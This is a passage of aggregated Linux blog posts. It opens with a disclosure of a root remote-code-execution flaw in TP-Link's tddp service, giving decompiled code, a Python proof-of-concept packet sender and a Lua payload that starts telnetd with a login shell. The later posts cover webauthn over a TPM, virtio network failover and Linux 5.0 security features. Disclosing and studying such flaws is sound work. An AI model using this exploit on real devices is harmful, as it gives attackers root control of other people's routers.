  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64]
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:

Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comment count unavailable comments

March 28, 2019 10:18 PM

March 23, 2019

James Bottomley: Webauthn in Linux with a TPM via the HID gadget

Account security on the modern web is a bit of a nightmare. Everyone understands the need for strong passwords which are different for each account, but managing them is problematic because the human mind just can’t remember hundreds of complete gibberish words so everyone uses a password manager (which, lets admit it, for a lot of people is to write it down). A solution to this problem has long been something called two factor authentication (2FA) which authenticates you by something you know (like a password) and something you posses (like a TPM or a USB token). The problem has always been that you ideally need a different 2FA for each website, so that a compromise of one website doesn’t lead to the compromise of all your accounts.

Enter webauthn. This is designed as a 2FA protocol that uses public key cryptography instead of shared secrets and also uses a different public/private key pair for each website. Thus aspiring to be a passwordless secure scalable 2FA system for the web. However, the webauthn standard only specifies how the protocol works when the browser communicates with the remote website, there’s a different standard called FIDO or U2F that specifies how the browser communicates with the second factor (called an authenticator in FIDO speak) and how that second factor works.

It turns out that the FIDO standards do specify a TPM as one possible backend, so what, you might ask does this have to do with the Linux Gadget subsystem? The answer, it turns out, is that although the standards do recommend a TPM as the second factor, they don’t specify how to connect to one. The only connection protocols in the Client To Authenticator Protocol (CTAP) specifications are USB, BLE and NFC. And, in fact, the only one that’s really widely implemented in browsers is USB, so if you want to connect your laptop’s TPM to a browser it’s going to have to go over USB meaning you need a Linux USB gadget. Conspiracy theorists will obviously notice that if the main current connector is USB and FIDO requires new USB tokens because it’s a new standard then webauthn is a boon to token manufacturers.

How does Webauthn Work?

The protocol comes in two flavours, version 1 and version 2. Version 1 is fixed cryptography and version 2 is agile cryptography. However, version1 is simpler so that’s the one I’ll explain.

Webauthn essentially consists of two phases: a registration phase where the authenticator is tied to the account, which often happens when the remote account is created, and authentication where the authenticator is used to log in again to the website after registration. Obviously accounts often outlive the second factor, especially if it’s tied to a machine like the TPM, so the standard contemplates a single account having multiple registered authenticators.

The registration request consists of a random challenge supplied by the remote website to prevent replay and an application id which is constructed by the browser from the website supplied ID and the web origin of the site. The design is that the application ID should be unique for each remote account and not subject to being faked by the remote site to trick you into giving up some other application’s credentials.

The authenticator’s response consists of a unique public key, an opaque key handle, an attestation X.509 certificate containing a public key and a signature over the challenge, the application ID, the public key and the key handle using the private key of the certificate. The remote website can verify this signature against the certificate to verify registration. Additionally, Google recommends that the website also verifies the attestation certificate against a list of know device master certificates to prove it is talking to a genuine U2F authenticator. Since no-one is currently maintaining a database of “genuine” second factor master certificates, this last step mostly isn’t done today.

In version 1, the only key scheme allowed is Elliptic Curve over the NIST P-256 curve. This means that the public key is always 65 bytes long and an encrypted (or wrapped) form of the private key can be stashed inside the opaque key handle, which may be a maximum of 255 bytes. Since the key handle must be presented for each authentication attempt, it relieves the second factor from having to remember an ever increasing list of public/private key pairs because all it needs to do is unwrap the private key from the opaque handle and perform the signature and then forget the unwrapped private key. Note that this means per user account authenticator, the remote website must store the public key and the key handle, meaning about 300 bytes extra, but that’s peanuts compared to the amount of information remote websites usually store per registered account.

To perform an authentication the remote website presents a unique challenge, the raw ID from which the browser should construct the same application ID and the key handle. Ideally the authenticator should verify that the application ID matches the one used for registration (so it should be part of the wrapped key handle) and then perform a signature over the application ID, the challenge and a unique monotonically increasing counter number which is sent back in the response. To validly authenticate, the remote website verifies the signature is genuine and that the count has increased from the last time authentication has done (so it has to store the per authenticator 4 byte count as well). Any increase is fine, so each second factor only needs to maintain a single monotonically increasing counter to use for every registered site.

Problems with Webauthn and the TPM

The primary problem is the attestation certificate, which is actually an issue for the whole protocol. TPMs are actually designed to do attestation correctly, which means providing proof of being a genuine TPM without compromising the user’s privacy. The way they do this is via a somewhat complex attestation protocol involving a privacy CA. The problem they’re seeking to avoid is that if you present the same certificate every time you use the device for registration you can be tracked via that certificate and your privacy is compromised. The way the TPM gets around this is that you can use a privacy CA to produce an arbitrary number of different certificates for the same TPM and you could present a new one every time, thus leaving nothing to be tracked by.

The ability to track users by certificate has been a criticism levelled at FIDO and the best the alliance can come up with is the idea that perhaps you batch the attestation certificates, so the same certificate is used in hundreds of new keys.

The problem for TPMs though is that until FIDO devices use proper privacy CA based attestation, the best you can do is generate a separate self signed attestation certificate. The reason is that the TPM does contain its own certificate, but it’s encryption only, not signing because of the way the TPM privacy CA based attestation works. Thus, even if you were willing to give up your privacy you can’t use the TPM EK certificate as the FIDO attestation certificate. Plus, if Google carries out its threat to verify attestation certificates, this scheme is no longer going to work.

Aside about Browsers and CTAP

The crypto aware among you will recognise that there is already a library based standard that can be used to talk to a variety of USB tokens and even the TPM called PKCS#11. Mozilla Firefox, for instance, already supports using this as I demonstrated in a previous blog post. One might think, based on what I said about the one token per key problem in the introduction, that PKCS#11 can’t support the new key wrapping based aspect of FIDO but, in fact, it can via the C_WrapKey/C_UnwrapKey API. The only thing PKCS#11 can’t do is the new monotonic counter.

Even if PKCS#11 can’t perform all the necessary functions, what about a new or extended library based protocol? This is a good question to which I’ve been unable to get a satisfactory answer. Certainly doing CTAP correctly requires that your browser be able to speak directly to the USB, Bluetooth and NFC subsystems. Perhaps not too hard for a single platform browser like Internet Explorer, but fraught with platform complexity for generic browsers like FireFox where the only solution is to have a rust based accessor for every supported platform.

Certainly the lack of a library interface are where the TPM issues come from, because without that we have to plug the TPM based FIDO layer into a browser over an existing CTAP protocol it supports, i.e. USB. Fortunately Linux has the USB Gadget subsystem which fits the bill precisely.

Building Synthetic HID Devices with USB Gadget

Before you try this at home, I should point out that the Linux HID Gadget has a longstanding bug that will cause your machine to hang unless you have this patch applied. You have been warned!

The HID subsystem is for driving Human Interaction Devices meaning keyboard and mice. However, it has a simple packet (called report in USB speak) based protocol which is easy for most things to use. In order to facilitate this, Linux actually provides hidraw devices which allow you to send and receive these reports using read and write system calls (which, in fact, is how Firefox on Linux speaks CTAP). What the hid gadget does when set up is provide all the static emulation of HID device protocols (like discovery pages) while allowing you to send and receive the hidraw packets over the /dev/hidgX device tap, also via read and write (essentially operating like a tty/pty pair1). To get the whole thing running, the final piece of the puzzle is that the browser (most likely running as you) needs to be able to speak to the hidraw device, so you need a udev rule to make it accessible because by default they’re 0600. Since the same goes for every other USB security token, you’ll find the template in the same rpm that installs the PKCS#11 library for the token.

The way CTAP works is that every transaction is split into 64 byte reports and sent over the hidraw interface. All you need to do to get this setup is initialise a report descriptor for this type of device. Since it’s somewhat cumbersome to do, I’ve created this script to do it (run it as root). Once you have this, the hidraw and hidg devices will appear (make them both user accessible with chmod 666) and then all you need is a programme to drive the hidg device and you’re done.

A TPM Based Hid Gadget Driver

Note: this section is written describing TPM 2.0.

The first thing we need out of the TPM is a monotonic counter, but all TPMs have NV counter indexes which can be created (all TPM counters are 8 byte, whereas the CTAP protocol requires 4 bytes, but we simply chop off the top 4 bytes). By convention I create the counter at NV index 01000101. Once created, this counter will be persistent and monotonic for the lifetime of the TPM.

The next thing you need is an attestation certificate and key. These must be NIST P-256 based, but it’s easy to get openssl to create them

openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:prime256v1 -pkeyopt ec_param_enc:named_curve -out reg_key.key

openssl req -new -x509 -subj '/CN=My Fido Token/' -key reg_key.key -out reg_key.der -outform DER

This creates a self signed certificate, but you could also create a certificate chain this way.

Finally, we need the TPM to generate one NIST P-256 key pair per registration. Here we use the TPM2_Create() call which gets the TPM to create a random asymmetric key pair and return the public and wrapped private pieces. We can simply bundle these up and return them as the key handle (fortunately, what the TPM spits back for a NIST P-256 key is about 190 bytes when properly marshalled). When the remote end requests an authentication, we extract the TPM key from the key handle and use a TPM2_Load to place it in the TPM and sign the hash and then unload it from the TPM. Putting this all together this project (which is highly experimental) provides the script to create the devices and a hidg driver that interfaces to the TPM. All you need to do is run it as

hidgd /dev/hidg0 reg_key.der reg_key.key

And you’re good to go. If you want to test it there are plenty of public domain webauthn test sites, webauthn.org and webauthn.io2 are two I’ve tested as working.

TODO Items

The webauthn standard specifies the USB authenticator should ask for permission before performing either registration or authentication. Currently the TPM hid gadget doesn’t have any external verification, but in future I’ll add a configurable pinentry to add confirmation and possibly also a single password for verification.

The current code also does nothing to verify the application ID on a per authorization basis. This is a security problem because you are currently vulnerable to being spoofed by malicious websites who could hand you a snooped key handle and then use the signature to fake your login to a different site. To avoid this, I’m planning to use the policy area of the TPM key to hold the application ID. This should work because the generated keys have no authorization, either policy or password, so the policy area is effectively redundant. It is in the unwrapped public key, but if any part of the public key is tampered with the TPM will detect this via a hash in the wrapped private error and give a binding error on load.

The current code really only does version 1 of the FIDO protocol. Ideally it needs upgrading to version 2. However, there’s not really much point because for all the crypto agility, most TPMs on the market today can only do NIST P-256 curves, so you wouldn’t gain that much.

Conclusions

Using this scheme you’re ready to play with FIDO/U2F as long as you have a laptop with a functional TPM 2.0 and a working USB gadget subsystem. If you want to play, please remember to make sure you have the gadget patch applied.

March 23, 2019 09:58 PM

March 17, 2019

Michael S. Tsirkin:

Virtio Network Device Failover


Support for Virtio Network Device Failover which has been merged for linux 4.17 presents an interesting study in interface design: both for operating systems and hypervisors. Read on for an article examining the problem domain, solution space and describing the current status of the implementation.


PT versus PV NIC

Imagine a Virtual Machine running on a hypervisor on a host computer. The hypervisor has access to a network to which the host is attached, but ow should guest gain this access? The answer could depend on the type of the netwok and on the network interface on the host. For the sake of this article we focus on Ethernet networks and NICs. In this setup a popular solution extends (bridges) the Ethernet network into the guest by exposing a virtual Ethernet device as part of the VM.

In most setups a single host NIC would be shared between VMs. Two popular configurations are shows below:

vm network configuration

In the first diagram (on the left) the NIC exposes Virtual Function (VFs) interfaces which the hypervisor “passes through” - makes accessible to the guests. Using such Passthrough (PT) interfaces packets can pass between the guest and the NIC directly. For PCI devices, device memory can actually be mapped into the address space of the virtual machine in such as way that guest can actually access the device without invoking the hypervisor. In the setup on the right packets are passed between the guest and the NIC by the hypervisor. The hypervisor interface used by guest for this purpose would commonly be a PV - Para-virtual (i.e. designed for the hypervisor) NIC. One example would be the Virtio network device, used for example with the KVM hypervisor. By comparison, Microsoft HyperV guests use the netvsc device with its PV NICs.

Since the underlying packets are still handled by the physical NIC in both cases, it would be unusual for the second (PV) setup to outperform the first (PT) one. Besides removing some of the hypervisor overhead, passthrough allows driver within the guest to be precisely tuned to the physical device.

However the PV NIC setup obviously offers more flexibility - for example, the hypervisor can implement an arbitrary filtering policy for the networking packets. By comparison, with PT NICs we are limited to the features presented by hardware NICs which are often more limited: some of them only have simplest filtering capabilities. As an example of a simple and effective filtering/security measure, guest would often be prevented from modifying the MAC address of its devices, limiting guest’s access to the host’s network.

But even besides limitations of specific hardware the standardized interface independent of the physical NIC makes the system easier to manage: use of a standard driver within guest as well as a well known state of the device enable features such as live migration of guests between hypervisors: guests can often be moved with negligible network downtime.

Same can not be generally said with the passthrough setup, for example, one of the issues encountered with it is that even a small difference between hypervisor hosts in their physical hardware would require expensive reconfiguration when switching hypervisors.

Can not something be done with respect to performance to get the speed benefits of pass-through without giving up on live migration and similar advantages of standardized PV NIC setups? One approach could be designing a pass-through NIC around a standard paravirtualized interface. This is the approach taken by the Virtio Data Path Accelerator devices. In absence of such an accelerator, Virtual Network Device Failover presents another possible approach.

Network device Failover basics

Conceptually, the idea behind Virtual Network Device Failover is simple: assume that a standard PV interface only brings benefits part of the time. The system would change its configuration accordingly - e.g. when migration is required use the PV interface, when it’s not - use a PT device.

When possible hypervisor will pass through the NIC to the guest as a “primary” device. To reduce downtime, a “standby” PV device could be kept around at all times. When PV features are not required, hypervisor can add guest access to the primary PT device. At other times the standby PV interface is used.

Accordingly, guest would be required to switch over between primary and standby interfaces depending on availability of the primary interface.

network device failover basics

An astute reader might notice that the above switching sounds a bit like the active-backup configuration of the bond and team network drivers in Linux. That is true - in fact in the past one of these drivers has often been used to implement network device failover. Let’s take a quick look at how active-backup can be used for network device failover.

Network Device Failover using active-backup

This text will use the term bond when meaning the network device created by either a bond or the team driver: the differences between these two mostly have to do with how devices are created, configured and destroyed and will not be covered here.

A bond device is a master software network device which can enslave multiple interfaces. In our case these would be the standby and the primary devices. For this, the bond master needs to be created and initialized with slave interface names before slaves are brought up. When priority of the primary interface is set higher than priority of the standby, the bond will switch between interfaces as required for failover.

The active-backup was designed to help create redundancy and improve uptime for systems with multiple NIC devices. To make it work for the virtual machine, we need guest to detect interface failure on the primary interface and switch to the stanby one. This can be achieved for example by removing the interface by making the hypervisor emulate hotplug removal request.

However the above might already hint at some of the issues with this approach to failover: first, bond needs to be set up by userspace. Configuring a bond for all devices unconditionally would be an option but would add overhead to all users. On the other hand, adding a slave to the bond would require bringing the slave down. For this reason to avoid downtime bond has to be created upfront, even if only the standby device is present during guest initialization.

Further, setting up an active-backup bond is considered a question of policy and thus is left up to guest admin. By comparison network failover is a mechanism - there’s no good reason not to use a PT interface if it is available to the guest. Should hypervisor want to force guest to create a bond, hypervisor would need a measure of control over guest network configuration which might conflict with the way some guest admins like to set up their networking.

Another issue is with device selection. Bond tends to address devices using their names. While recently device names under many Linux distributions became more predictable, it is not the case for all distributions, and specific naming schemes might differ. It is thus a challenge for the hypervisor to specify to the guest which interfaces need to be bonded together.

To help reduce downtime, the bond will also broadcast location information on a network on every switch. This is not too problematic but might cause extra load on the network - likely unnecessary in case of virtual device failover since packets are in the end traveling over the same physical wire.

Maintaining a consistent MAC address for the guest is necessary to avoid need for all guest neighbours to rediscover the MAC address using the slow APR/Neighbour Discovery. To help with that, bond will try to program the MAC address into the primary device when it’s attached. If MAC programming is disabled as a security measure (as described above) bond will generally fail to attach to this slave.

Failover goals; 1,2 and 3 device models

The goal of the network device failover support in Linux is to address the above problems. Specifically: - PT cards with MAC programming disabled need to be supported - configuration should happen automatically, with no need for userspace to make a policy decision - in particular the primary/standby pair of devices should be selected with no need for special configuration to be passed from hypervisor - support as wide a range of existing network setup tools as possible with minimal changes

Most of the design seems to fall out from the above goals in a manner that is more or less straight-forward: - design supports two devices: a standby PV device is present at all times and used by default; a primary PT device is used by preference when it’s available - failover support is initialized by the PV device driver, e.g. in the case of Virtio this happens when the Virtio-net driver detects a special feature bit set by the hypervisor on the Virtio PV device - to support devices without MAC programming, both standby and primary can be simply required to be initialized (e.g. by the hypervisor) with the same MAC address - in that case, MAC address can also used by failover to locate and enslave the primary device

However, the requirement to minimize userspace changes caused a certain amount of debate about the best way to model the failover setup, with the debate centered around the number of network device structures being created and exposed to userspace. It seems worthwhile to list the options that have been debated, below:

1-device model

In a 1-device model userspace sees a single failover device at all times. At any time this device would be either the PT or the PV device. As userspace might need to configure devices differently depending on the specific driver used, a new interface would have to be introduced for kernel to report driver changes to userspace, and for userspace to detect the actual driver used. However, as long as userspace does not contain any driver-specific code, userspace tools that already work with the Virtio device seem to be guaranteed to keep working without any changes, but with a better performance.

To best of author’s knowledge, no actual code supporting this mode has ever been posted.

2-device model

In a 2-device model, the standby and primary devices are exposed to userspace as two network devices. The devices aren’t independent: primary device is a slave and standby is the master in that when primary is present, standby device forwards outgoing packets for transmission on the primary device.

PT driver discovery and device specific configuration can happen on the slave interface using standard device discovery interfaces.

Both portable configuration affecting both PV and PT devices (such as interface MTU) and the configuration that is specific to the PV device will happen on the master interface.

The 2-device model is used by the netvsc driver in Linux. It has been used in production for a number of years with no significant issues reported. However, it diverges from the model used by the bond driver, and the combination of PV-specific and portable configuration on the master device was seen by some developers as confusing.

3-device model

The 3-device model basically follows bond: a master failoverdevice forwards packets to either the primary or the standbyslaves, depending on the primary’s availability.

Failover device maintains portable configuration, primary and standby can each have its own driver-specific configuration.

This model is used by the net_failover driverwhich has been present in Linux since version 4.17. This model isn’t transparent to userspace: for example, presence of at least two devices (failover master and primary slave) at all times seems to confuse some userspace tools such as dracut, udev, initramfs-tools, cloud-init. Most of these tools have since been updated to check the slave flag of each interface and ignore interfaces where it is set.

3-device model with hidden slaves

It is possible that the compatibility of the 3-device model with existing userspace can be improved by somehow hiding the slave devices from most legacy userspace tools, unless they explicitly ask for them.

For example it could be possible to somehow move them to some kind of special network namespace. No patches to implement this idea have been posted so far.

Hypervisor failover support

At the time of this article writing, support for virtual network device failover in the QEMU/KVM hypervisor is still being worked upon. This work uncovered a surprising number of subtle issues some of which will be covered below.

Primary device availability

Network Failover driver relies on hotplug events for the primary device availability. In other words, to make the primary device available to the guest the hypervisor emulates a hot-add hotplug event on a bus within VM (e.g. the virtual PCI bus). To make the primary device unavailable, a hot-unplug event is emulated.

Note that at the moment most PCI drivers expect a chance to be notified and execute cleanup before a device is removed. From hypervisor’s point of view, this would mean that it can not remove the PT device and e.g. can not initiate migration until it receives a response from the VM guest. Making hypervisor depend on guest being responsive in this way is problematic e.g. from the security point of view.

As described earlier in a lwn.net article most drivers do not at the moment support surprise removal well. When that is addressed, hypervisors will be able to switch to emulate surprise removal to remove dependency on guest responsiveness.

Existing Guest compatibility

One of the issues that hypervisors take pains to handle well is compatibility with existing guests, that is guests which have not been modified with virtual network device failover support.

One possible issue is that existing guests can become confused if they detect two Ethernet devices with the same MAC address.

To help address this issue, the hypervisor can defer making the primary device visible to the guest until after the PV driver has been initialized. The PV driver can signal to the hypervisor guest support for the virtual network device failover.

For example, in case of the virtio-net driver, hypervisor can signal the support for failover to guest by setting the VIRTIO_NET_F_STANDBYhost feature bit on the Virtio device. If failover is enabled, the driver can signal failover support to hypervisor by setting the matching VIRTIO_NET_F_STANDBY guest feature bit on the device.

After detecting a modern guest with failover support, the hypervisor can hot-add the primary device. Device will have to be hot-removed again on guest reset - in case the VM will reboot into a legacy guest without failover support.

This is also helpful to avoid initializing a useless failover device on hypervisors without actual failover support.

As of the time of writing of this article, the definition of the VIRTIO_NET_F_STANDBY and its support are present in Linux. Some preliminary hypervisor patches with known issues have been posted.

Packet filtering issues

Early implementations of the failover in QEMU were originally tested with an emulated NIC. When tested on a physical one, it was quickly detected that for many configurations significant downtime occurs.

The reason has to do with how incoming packets are processed by the host NIC. Generally, a packet is matched against some rules (e.g. the destination MAC is matched using a forwarding filter) and a decision is made to forward the packet either to the hypervisor or to a guest through a VF.

incoming packet filtered

Consider again a hypervisor transitioning between configurations where a primary passthrough VF is available to a configuration where it is unavailable to the guest.

When the primary device is available to the guest we want incoming packets with destination MAC matching the device to be forwarded through the primary. In many configurations this happens immediately when the hypervisor programs the MAC into the VF. In these setups, when primary device becomes unavailable to guest, unless special steps are taken, incoming packets will still be filtered to it and eventually dropped.

incoming packet being dropped by device

One possible fix is have the hypervisor update the host NIC filtering, e.g., by updating the MAC of the VF to a different value. Another is to change the filtering on the host NIC such that it only happens when a driver is attached to the VF. This seems to already be the case for some drivers (such as ice,mlx) and so one can argue that others should be changed to behave consistently. Another approach would be to teach hypervisor to detect the difference and handle both types of behaviour.

Conversely, when the primary interface becomes available to guest, we would like packets to start flowing through the primary but only after the driver is bound to it. Again, on some devices hypervisor might need to intervene to update the forwarding filter on the host NIC. One issue is that it might take guests a while to detect a hot-add event and bind a driver to the primary device. This is because hotplug is not generally considered a data path operation. Should the host NIC filter be updated by the hypervisor immediately on hot-add, there will be a large window during which guest driver has not been initialized yet.

incoming packet being dropped by driver

As a possible fix, hypervisors can detect that the pass-through driver has been attached to device. For example, drivers enable bus-mastering on the device when they start using it, and disable it when they stop using it. Hypervisor can detect this event and update the forwarding filter on the host NIC accordingly.

QEMU patches addressing both issues have been posted on the QEMU mailing list.

An alternative could be to add a way for guest to request the switch between primary and standby through the PV device driver. This might reduce the downtime slightly: some PT drivers might enable bus mastering before they are fully ready to receive packets, causing a small window during which packets are still dropped.

This alternative approach is used by the netvsc driver. Using that with net_failover would require extending the Virtio interface and adding support to the net_failover driver in Linux, as of today no patches implementing this change have been posted.

As described above, some differences in behaviour between host NICs make failover implementation harder. While not yet widely supported, use of VF representors could make it easier to consistently configure host NICs for use by failover. However, for it to be helpful to userspace wide support across many NICs would be necessary.

Non-MAC based pairing

One basic question that had to be addressed early in the design was: how does failover master decide to which slave devices to bind? Unlike bond, failover by design can not rely on the administrator supplying the configuration.

So far, implementations focused on matching MAC addresses as a way to match slave devices. However, some configurations (sometimes called trusted VFs) do not supply VF MAC addresses by the hypervisor.

This seems to call for an alternative mechanism for locating the primary that is not based on the MAC address.

The netvsc driver uses a serial number value to locate the primary device. The serial is typically communicated through the VMBus interface and attached to a para-virtual PCI bus slot created for the device. QEMU/KVM traditionally do not have a para-virtual bus implementation, relying instead of emulating a PCI bus for VMs. One possible approach for QEMU would be to attach an ID value to a PCI slot, or bridge. For example, an ACPI Slot Unique Number, the PCI Physical Slot Number register, or an alternative vendor-specific ID register could be fit for this purpose. The ID could be supplied to the VM guest through the Virtio device. Failover driver would locate the slot based on the ID, and bind to any device located behind the slot. It would then program the MAC address from the standby device into the primary device.

An early implementation of this idea has been posted on the QEMU mailing list, however no patches to the failover driver have been posted yet.

Host network topology and other optimizations

In some configurations it might be better for the guest to use the PV interface in preference to the passthrough one. For example, if the PCI bus is very busy, and there’s spare CPU capacity on the host, it might be faster to send a packet that is destined to another VM on the same host through the hypervisor, bypassing the PCI bus.

This seems to call for keeping both interfaces active at all times. Supporting such an optimization would need to address the possibility of VM migration as well as the dynamic nature of the CPU/PCI bus available capacity, such that the specific interface used for sending packets to each destination can change at any time.

No patches for such support have been posted as of the time of writing of this article.

Specification status

Definition of the VIRTIO_NET_F_STANDBY has been included in the latest Virtio specification draft virtio-v1.1-csprd01.

Non-Linux/non-KVM support

Besides Linux, which systems could benefit from virtual network device failover support?

The DPDK set of userspace drivers is set to gain this support soon.

Drivers for other operating systems could also benefit from increased performance. One can expect the work on these drivers to start in earnest once the hypervisor support is widely available.

Other virtual devices besides Virtio could implement failover. netvsc already has a 2-device implementation that does not rely on the net_failover driver. It is possible that xen-netfront or vmxnet devices could use the failover driver. The author is not familiar with these devices.

Summary

A straight-forward sounding idea of improving performance for a Virtio network device by allowing networking traffic for the VM to temporary travel over a pass-through device exposed a wealth of issues on both VM host and guest sides.

Acknowledgements

The author thanks Jens Freimann for help analyzing netvsc as well as proof-reading the draft and suggesting corrections. The author thanks multiple contibutors who worked on implementation and helped review and guide the feature design over time.

March 17, 2019 05:22 AM

March 12, 2019

Kees Cook: security things in Linux v5.0

Previously: v4.20.

Linux kernel v5.0 was released last week! Looking through the changes, here are some security-related things I found interesting:

read-only linear mapping, arm64
While x86 has had a read-only linear mapping (or “Low Kernel Mapping” as shown in /sys/kernel/debug/page_tables/kernel under CONFIG_X86_PTDUMP=y) for a while, Ard Biesheuvel has added them to arm64 now. This means that ranges in the linear mapping that contain executable code (e.g. modules, JIT, etc), are not directly writable any more by attackers. On arm64, this is visible as “Linear mapping” in /sys/kernel/debug/kernel_page_tables under CONFIG_ARM64_PTDUMP=y, where you can now see the page-level granularity:

---[ Linear mapping ]---
...
0xffffb07cfc402000-0xffffb07cfc403000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc403000-0xffffb07cfc4d0000  820K PTE   RW NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d0000-0xffffb07cfc4d1000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d1000-0xffffb07cfc79d000 2864K PTE   RW NX SHD AF NG    UXN MEM/NORMAL

per-task stack canary, arm
ARM has supported stack buffer overflow protection for a long time (currently via the compiler’s -fstack-protector-strong option). However, on ARM, the compiler uses a global variable for comparing the canary value, __stack_chk_guard. This meant that everywhere in the kernel needed to use the same canary value. If an attacker could expose a canary value in one task, it could be spoofed during a buffer overflow in another task. On x86, the canary is in Thread Local Storage (TLS, defined as %gs:20 on 32-bit and %gs:40 on 64-bit), which means it’s possible to have a different canary for every task since the %gs segment points to per-task structures. To solve this for ARM, Ard Biesheuvel built a GCC plugin to replace the global canary checking code with a per-task relative reference to a new canary in struct thread_info. As he describes in his blog post, the plugin results in replacing:

8010fad8:       e30c4488        movw    r4, #50312      ; 0xc488
8010fadc:       e34840d0        movt    r4, #32976      ; 0x80d0
...
8010fb1c:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fb20:       e5943000        ldr     r3, [r4]
8010fb24:       e1520003        cmp     r2, r3
8010fb28:       1a000020        bne     8010fbb0
...
8010fbb0:       eb006738        bl      80129898 <__stack_chk_fail>

with:

8010fc18:       e1a0300d        mov     r3, sp
8010fc1c:       e3c34d7f        bic     r4, r3, #8128   ; 0x1fc0
...
8010fc60:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fc64:       e5943018        ldr     r3, [r4, #24]
8010fc68:       e1520003        cmp     r2, r3
8010fc6c:       1a000020        bne     8010fcf4
...
8010fcf4:       eb006757        bl      80129a58 <__stack_chk_fail>

r2 holds the canary saved on the stack and r3 the known-good canary to check against. In the former, r3 is loaded through r4 at a fixed address (0x80d0c488, which “readelf -s vmlinux” confirms is the global __stack_chk_guard). In the latter, it’s coming from offset 0x24 in struct thread_info (which “pahole -C thread_info vmlinux” confirms is the “stack_canary” field).

per-task stack canary, arm64
The lack of per-task canary existed on arm64 too. Ard Biesheuvel solved this differently by coordinating with GCC developer Ramana Radhakrishnan to add support for a register-based offset option (specifically “-mstack-protector-guard=sysreg -mstack-protector-guard-reg=sp_el0 -mstack-protector-guard-offset=...“). With this feature, the canary can be found relative to sp_el0, since that register holds the pointer to the struct task_struct, which contains the canary. I’m hoping there will be a workable Clang solution soon too (for this and 32-bit ARM). (And it’s also worth noting that, unfortunately, this support isn’t yet in a released version of GCC. It’s expected for 9.0, likely this coming May.)

top-byte-ignore, arm64
Andrey Konovalov has been laying the groundwork with his Top Byte Ignore (TBI) series which will also help support ARMv8.3’s Pointer Authentication (PAC) and ARMv8.5’s Memory Tagging (MTE). While TBI technically conflicts with PAC, both rely on using “non-VA-space” (Virtual Address) bits in memory addresses, and getting the kernel ready to deal with ignoring non-VA bits. PAC stores signatures for checking things like return addresses on the stack or stored function pointers on heap, both to stop overwrites of control flow information. MTE stores a “tag” (or, depending on your dialect, a “color” or “version”) to mark separate memory allocation regions to stop use-after-tree and linear overflows. For either of these to work, the CPU has to be put into some form of the TBI addressing mode (though for MTE, it’ll be a “check the tag” mode), otherwise the addresses would resolve into totally the wrong place in memory. Even without PAC and MTE, this byte can be used to store bits that can be checked by software (which is what the rest of Andrey’s series does: adding this logic to speed up KASan).

ongoing: implicit fall-through removal
